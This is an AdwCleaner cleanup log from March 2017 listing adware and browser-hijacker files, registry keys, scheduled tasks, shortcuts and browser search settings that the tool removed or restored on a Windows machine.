    # Support : Customer Support & Help Center



    ***** [ Services ] *****



    ***** [ Folders ] *****

    [-] Folder deleted: C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent
    [-] Folder deleted: C:\Users\User\AppData\Roaming\Profiles\tst8dpyk.default


    ***** [ Files ] *****

    [-] File deleted: C:\Windows\SysNative\log\iSafeKrnlCall.log
    [-] File deleted: C:\Windows\SysNative\drivers\iSafeKrnlBoot.sys
    [-] File deleted: C:\Program Files (x86)\settings.dat
    [-] File deleted: C:\Users\Public\Documents\cfg.ini
    [-] File deleted: C:\Users\Public\Documents\cc.ini
    [-] File deleted: C:\Users\Public\Documents\temp.dat
    [-] File deleted: C:\Users\Public\Documents\report.dat
    [#] File deleted: C:\Users\User\AppData\Roaming\Profiles\tst8dpyk.default\extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi
    [#] File deleted: C:\Users\User\AppData\Roaming\Profiles\tst8dpyk.default\extensions\@DA3566E2-F709-11E5-8E87-A604BC8E7F8B.xpi
    [#] File deleted: C:\Users\User\AppData\Roaming\Profiles\tst8dpyk.default\searchplugins\palikan.xml
    [-] File deleted: C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\xt4h78mw.default\searchplugins\nice.xml
    [#] File deleted: C:\Users\User\AppData\Roaming\Profiles\tst8dpyk.default\searchplugins\nice.xml
    [-] File deleted: C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\xt4h78mw.default\searchplugins\mylucky123.xml
    [#] File deleted: C:\Users\User\AppData\Roaming\Profiles\tst8dpyk.default\searchplugins\searchinme.xml
    [#] File deleted: C:\Users\User\AppData\Roaming\Profiles\tst8dpyk.default\SEARCHPLUGINS\searchinme.xml


    ***** [ DLL ] *****



    ***** [ WMI ] *****



    ***** [ Shortcuts ] *****

    [-] Shortcut disinfected: C:\Users\Public\Desktop\Google Chrome.lnk
    [-] Shortcut disinfected: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
    [-] Shortcut disinfected: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
    [-] Shortcut disinfected: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
    [-] Shortcut disinfected: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
    [-] Shortcut disinfected: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\f73cfe270e0a8f33\Google Chrome.lnk
    [-] Shortcut disinfected: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\c5ecd897b04d4fe6\Google Chrome.lnk
    [-] Shortcut disinfected: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\b216584368a76cee\Google Chrome.lnk
    [-] Shortcut disinfected: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\513998e1b006ffdf\Google Chrome.lnk
    [-] Shortcut disinfected: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\4f572ee5bdaa3aca\Google Chrome.lnk
    [-] Shortcut disinfected: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\276bc18f565c8259\Google Chrome.lnk


    ***** [ Scheduled Tasks ] *****

    [-] Task deleted: Milimili
    [-] Task deleted: BikaQ_FetchAndUpgrade_CanBeDel


    ***** [ Registry ] *****

    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.001
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.7z
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.arj
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.bz2
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.bzip2
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.cab
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.cpio
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.deb
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.dmg
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.fat
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.gz
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.gzip
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.hfs
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.iso
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.lha
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.lzh
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.lzma
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.ntfs
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.rar
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.rpm
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.squashfs
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.swm
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.tar
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.taz
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.tbz
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.tbz2
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.tgz
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.tpz
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.txz
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.vhd
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.wim
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.xar
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.xz
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.z
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.zip
    [-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\winzipersvc
    [#] Key deleted on reboot: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\winzipersvc
    [-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\qkseeService
    [#] Key deleted on reboot: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\qkseeService
    [-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\WinSnare
    [#] Key deleted on reboot: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\WinSnare
    [-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\iedvutils
    [#] Key deleted on reboot: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\iedvutils
    [-] Key deleted: HKLM\SOFTWARE\Classes\OCComSDK.ComSDK
    [-] Key deleted: HKLM\SOFTWARE\Classes\OCComSDK.ComSDK.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshDecoWizardPage_c
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshDecoWizardPage_c.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshDoctorPage_c
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshDoctorPage_c.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshManipulationPage
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshManipulationPage.24
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshPrepCompPage_c
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshPrepCompPage_c.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshRelaxPage_c
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshRelaxPage_c.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshSmoothPage_c
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshSmoothPage_c.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshSplitPage_c
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshSplitPage_c.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\OCComSDK.ComSDK
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\OCComSDK.ComSDK.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshDecoWizardPage_c
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshDecoWizardPage_c.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshDoctorPage_c
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshDoctorPage_c.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshManipulationPage
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshManipulationPage.24
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshPrepCompPage_c
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshPrepCompPage_c.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshRelaxPage_c
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshRelaxPage_c.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshSmoothPage_c
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshSmoothPage_c.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshSplitPage_c
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshSplitPage_c.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{F83D1872-D9FF-47F8-B5A0-49CC51E24EE8}
    [-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{BA32987D-DB80-4CCB-A8BB-F812B5421C0F}
    [-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{B9D64D3B-BE75-4FA2-B94A-C4AE772A0146}
    [-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{47A1DF02-BCE4-40C3-AE47-E3EA09A65E4A}
    [-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{FA7B2795-C0C8-4A58-8672-3F8D80CC0270}
    [-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{47A1DF02-BCE4-40C3-AE47-E3EA09A65E4A}
    [-] Key deleted: HKLM\SOFTWARE\Classes\TypeLib\{1112F282-7099-4624-A439-DB29D6551552}
    [-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{BA32987D-DB80-4CCB-A8BB-F812B5421C0F}
    [-] Key deleted: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{BA32987D-DB80-4CCB-A8BB-F812B5421C0F}
    [-] Key deleted: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{BA32987D-DB80-4CCB-A8BB-F812B5421C0F}
    [-] Key deleted: HKU\.DEFAULT\Software\ompndb
    [-] Key deleted: HKU\.DEFAULT\Software\jhdbca
    [-] Key deleted: HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\ICSW1.17
    [-] Key deleted: HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\PRODUCTSETUP
    [#] Key deleted on reboot: HKU\S-1-5-18\Software\ompndb
    [#] Key deleted on reboot: HKU\S-1-5-18\Software\jhdbca
    [#] Key deleted on reboot: HKCU\Software\ICSW1.17
    [#] Key deleted on reboot: HKCU\Software\PRODUCTSETUP
    [-] Key deleted: HKLM\SOFTWARE\Elex-tech
    [-] Key deleted: HKLM\SOFTWARE\hdcode
    [-] Key deleted: HKLM\SOFTWARE\trotuxSoftware
    [-] Key deleted: HKLM\SOFTWARE\ScreenShot
    [-] Key deleted: HKLM\SOFTWARE\WinZiper
    [-] Key deleted: HKLM\SOFTWARE\WinSaberSvc
    [-] Key deleted: HKLM\SOFTWARE\ompndb
    [-] Key deleted: HKLM\SOFTWARE\jhdbca
    [-] Key deleted: HKLM\SOFTWARE\InterHop
    [-] Key deleted: HKLM\SOFTWARE\WinArcher
    [-] Key deleted: HKLM\SOFTWARE\amule-custom
    [-] Key deleted: HKLM\SOFTWARE\mylucky123Software
    [-] Key deleted: HKLM\SOFTWARE\amisitesSoftware
    [-] Key deleted: HKLM\SOFTWARE\startpageing123Software
    [-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\iSafe
    [-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564
    [-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A0275D4F-FFAB-4A42-9874-B871B1C4CA3D}
    [-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{19539992-061C-4E8B-9053-07B175303AF4}
    [-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{418DDAC3-E16C-47C2-B5FE-4FBCAB0E10D0}
    [-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{56B2B28A-E663-4D28-84A3-3846068A7D63}
    [-] Key deleted: HKLM\SOFTWARE\CLIENTS\Corner Sunshine
    [#] Key deleted on reboot: [x64] HKCU\Software\ICSW1.17
    [#] Key deleted on reboot: [x64] HKCU\Software\PRODUCTSETUP
    [-] Key deleted: [x64] HKLM\SOFTWARE\ompndb
    [-] Key deleted: [x64] HKLM\SOFTWARE\jhdbca
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\CLIENTS\Corner Sunshine
    [-] Key deleted: HKLM\SOFTWARE\Classes\Installer\Features\F4D5720ABAFF24A489478B171B4CACD3
    [-] Key deleted: HKLM\SOFTWARE\Classes\Installer\Features\A82B2B65366E82D4483A836460A8D736
    [-] Key deleted: HKLM\SOFTWARE\Classes\Installer\Products\F4D5720ABAFF24A489478B171B4CACD3
    [-] Key deleted: HKLM\SOFTWARE\Classes\Installer\Products\A82B2B65366E82D4483A836460A8D736
    [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-3023424667-1579791547-2771295078-1001\Products\3CADD814C61E2C745BEFF4CBBAE0010D
    [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\F4D5720ABAFF24A489478B171B4CACD3
    [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\29993591C160B8E40935701B5703A34F
    [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\A82B2B65366E82D4483A836460A8D736
    [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\29993591C160B8E40935701B5703A34F
    [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A82B2B65366E82D4483A836460A8D736
    [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FFA0118CE95AE0D70F14E7E8A72452C8
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\F4D5720ABAFF24A489478B171B4CACD3
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\29993591C160B8E40935701B5703A34F
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\A82B2B65366E82D4483A836460A8D736
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Installer\Features\F4D5720ABAFF24A489478B171B4CACD3
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Installer\Features\A82B2B65366E82D4483A836460A8D736
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Installer\Products\F4D5720ABAFF24A489478B171B4CACD3
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Installer\Products\A82B2B65366E82D4483A836460A8D736
    [-] Data restored: HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\Main [Search Page]
    [-] Data restored: HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\Main [Start Page]
    [-] Data restored: HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\Main [Default_Page_URL]
    [-] Data restored: HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\Main [Default_Search_URL]
    [-] Data restored: HKCU\Software\Microsoft\Internet Explorer\Main [Search Page]
    [-] Data restored: HKCU\Software\Microsoft\Internet Explorer\Main [Start Page]
    [-] Data restored: HKCU\Software\Microsoft\Internet Explorer\Main [Default_Page_URL]
    [-] Data restored: HKCU\Software\Microsoft\Internet Explorer\Main [Default_Search_URL]
    [-] Data restored: HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Default_Search_URL]
    [-] Data restored: HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Default_Page_URL]
    [-] Data restored: HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Start Page]
    [-] Data restored: HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Search Page]
    [-] Data restored: HKLM\SOFTWARE\Microsoft\Internet Explorer\AboutURls [Tabs]
    [-] Data restored: [x64] HKCU\Software\Microsoft\Internet Explorer\Main [Search Page]
    [-] Data restored: [x64] HKCU\Software\Microsoft\Internet Explorer\Main [Start Page]
    [-] Data restored: [x64] HKCU\Software\Microsoft\Internet Explorer\Main [Default_Page_URL]
    [-] Data restored: [x64] HKCU\Software\Microsoft\Internet Explorer\Main [Default_Search_URL]
    [-] Data restored: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Default_Search_URL]
    [-] Data restored: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Default_Page_URL]
    [-] Data restored: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Start Page]
    [-] Data restored: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Search Page]
    [-] Key deleted: HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\SearchScopes\{20B9D1AE-AD1A-38B4-87FE-AF278DA9861D}
    [-] Key deleted: HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}
    [-] Data restored: HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
    [-] Key deleted: HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\SearchScopes\{6586d803-df30-46d3-a89a-4136c8571d45}
    [#] Key deleted on reboot: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{20B9D1AE-AD1A-38B4-87FE-AF278DA9861D}
    [#] Key deleted on reboot: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}
    [-] Data restored: HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
    [#] Key deleted on reboot: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{6586d803-df30-46d3-a89a-4136c8571d45}
    [-] Key deleted: HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{20B9D1AE-AD1A-38B4-87FE-AF278DA9861D}
    [-] Data restored: HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes [DefaultScope] {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
    [#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{20B9D1AE-AD1A-38B4-87FE-AF278DA9861D}
    [#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}
    [-] Data restored: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
    [#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{6586d803-df30-46d3-a89a-4136c8571d45}
    [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}
    [-] Data restored: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes [DefaultScope] {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
    [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6586d803-df30-46d3-a89a-4136c8571d45}
    [-] Key deleted: HKLM\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\WinZipper
    [-] Key deleted: HKLM\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinZipper
    [-] Key deleted: HKLM\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinZipper
    [-] Key deleted: HKCU\SOFTWARE\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}
    [-] Key deleted: HKLM\SOFTWARE\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}
    [#] Key deleted on reboot: HKLM\SOFTWARE\MOZILLA\FIREFOX\{EB52F1AB-3C2B-424F-9794-833C687025CF}
    [#] Key deleted on reboot: HKCU\SOFTWARE\MOZILLA\FIREFOX\{EB52F1AB-3C2B-424F-9794-833C687025CF}
    [-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Control\Power\User\PowerSchemes\e24b7131-d039-43cb-9e6f-ad4be601ec1f
    [-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Control\Power\User\PowerSchemes\04262113-2a31-48e1-b4bb-3b42174bea0f
    [#] Key deleted on reboot: HKLM\SYSTEM\ControlSet001\Control\Power\User\PowerSchemes\e24b7131-d039-43cb-9e6f-ad4be601ec1f
    [#] Key deleted on reboot: HKLM\SYSTEM\ControlSet001\Control\Power\User\PowerSchemes\04262113-2a31-48e1-b4bb-3b42174bea0f
    [-] Value deleted: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost [WinSAPSvc]
    [-] Value deleted: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost [ArcherGroupEx]
    [-] Key deleted: HKLM\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinZipper
    [-] Value deleted: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost [GubedZLGroupEx]
    [-] Value deleted: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost [GubZLGroEx]
    [-] Key deleted: HKCU\SOFTWARE\Classes\ChromeHTML
    [-] Key deleted: HKCU\SOFTWARE\Clients\StartMenuInternet\ChromeHTML
    [-] Value deleted: HKLM\SOFTWARE\Mozilla\Firefox\Extensions [arthurj8283@gmail.com]
    [#] Value deleted on reboot: HKLM\SOFTWARE\Mozilla\Firefox\Extensions [arthurj8283@gmail.com]
    [#] Value deleted on reboot: HKLM\SOFTWARE\Mozilla\Firefox\Extensions [arthurj8283@gmail.com]
    [-] Key deleted: HKCU\Software\Google\Chrome\Extensions\ljibkigjccbegnbeojkoafejpoiachej
    [-] Key deleted: HKLM\SOFTWARE\Google\Chrome\Extensions\ljibkigjccbegnbeojkoafejpoiachej
    [#] Key deleted on reboot: [x64] HKCU\Software\Google\Chrome\Extensions\ljibkigjccbegnbeojkoafejpoiachej
    [-] Key deleted: [x64] HKLM\SOFTWARE\Google\Chrome\Extensions\ljibkigjccbegnbeojkoafejpoiachej


    ***** [ Web browsers ] *****

    [-] Firefox fake profile cleaned: Profile1
    [-] Firefox preferences cleaned: "browser.search.defaultenginename" - "nice"
    [-] Firefox preferences cleaned: "browser.search.order.1" - "nice"
    [-] Firefox preferences cleaned: "browser.search.searchengine.iconURL" - "hxxp://www.luckysearch123.com/favicon.ico?t=1"
    [-] Firefox preferences cleaned: "browser.search.searchengine.url" - "hxxp://www.luckysearch123.com/search.php?type=ds&ts=1487229756&from=14a10216&uid=toshibaxmq01abf050_z4lkc79ytxxz4lkc79yt&z=049c73437918e7fc6fe3dfegaz7b9m8o9o9t2m2qdg&q={searchTerms}"
    [-] Firefox preferences cleaned: "browser.search.selectedEngine" - "nice"
    [-] Firefox preferences cleaned: "browser.startup.homepage" - "hxxp://www.luckysearch123.com?type=hp&ts=1487229756&from=14a10216&uid=toshibaxmq01abf050_z4lkc79ytxxz4lkc79yt&z=049c73437918e7fc6fe3dfegaz7b9m8o9o9t2m2qdg"
    [-] Firefox preferences cleaned: "browser.newtab.url" - "hxxp://www.luckysearch123.com?type=hp&ts=1487229756&from=14a10216&uid=toshibaxmq01abf050_z4lkc79ytxxz4lkc79yt&z=049c73437918e7fc6fe3dfegaz7b9m8o9o9t2m2qdg"
    [-] Firefox preferences cleaned: "browser.newtab.url" - "hxxp://www.luckysearch123.com?type=hp&ts=1487229756&from=14a10216&uid=toshibaxmq01abf050_z4lkc79ytxxz4lkc79yt&z=049c73437918e7fc6fe3dfegaz7b9m8o9o9t2m2qdg"
    [-] Firefox preferences cleaned: "browser.search.searchengine.iconURL" - "hxxp://www.luckysearch123.com/favicon.ico?t=1"
    [-] Firefox preferences cleaned: "browser.search.searchengine.url" - "hxxp://www.luckysearch123.com/search.php?type=ds&ts=1487229756&from=14a10216&uid=toshibaxmq01abf050_z4lkc79ytxxz4lkc79yt&z=049c73437918e7fc6fe3dfegaz7b9m8o9o9t2m2qdg&q={searchTerms}"
    [-] Firefox preferences cleaned: "browser.startup.homepage" - "hxxp://www.luckysearch123.com?type=hp&ts=1487229756&from=14a10216&uid=toshibaxmq01abf050_z4lkc79ytxxz4lkc79yt&z=049c73437918e7fc6fe3dfegaz7b9m8o9o9t2m2qdg"
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: aol.com
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: ask.com
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: go search
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: delta-homes
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: v9
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: delta-homes_
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: v9_
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: omniboxes
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: search.delta-homes.com
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: v9.com
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: palikan.com
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default] [extension] Deleted: ljibkigjccbegnbeojkoafejpoiachej
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default] [extension] Deleted: noajmlkipclmeolfcnflkjhijkigpfjh
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default] [homepage] Deleted: hxxp://www.palikan.com/?f=1&a=plk_dstndrm_15_51&cd=2XzuyEtN2Y1L1Qzu0A0C0DtC0BzzyE0BtD0F0AtD0FtAtC0EtN0D0Tzu0StCyEyEyCtN1L2XzutAtFtCyDtFtAtFtDtN1L1Czu1ByEtN1L1G1B1V1N2Y1L1Qzu2SyD0EyBzyyDtCtDtCtGyCyE0FzytG0AyEzzyEtGtB0AzztCtGtDyByCzyyCtA0AtAzz0BtD0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyD0AzyzytDyD0CtAtG0Azz0CzztGyEtC0C0AtG0BzzyBtCtGtBtCtAyByE0CtDzy0F0ByE0A2QtN0A0LzuyE&cr=513584365&ir=


    *************************

    :: "Tracing" keys deleted
    :: Winsock settings cleared

    *************************

    C:\AdwCleaner\AdwCleaner[C0].txt - [24497 Bytes] - [15/03/2017 14:04:22]
    C:\AdwCleaner\AdwCleaner[S0].txt - [35461 Bytes] - [15/03/2017 13:04:57]
    C:\AdwCleaner\AdwCleaner[S1].txt - [35272 Bytes] - [15/03/2017 13:16:56]
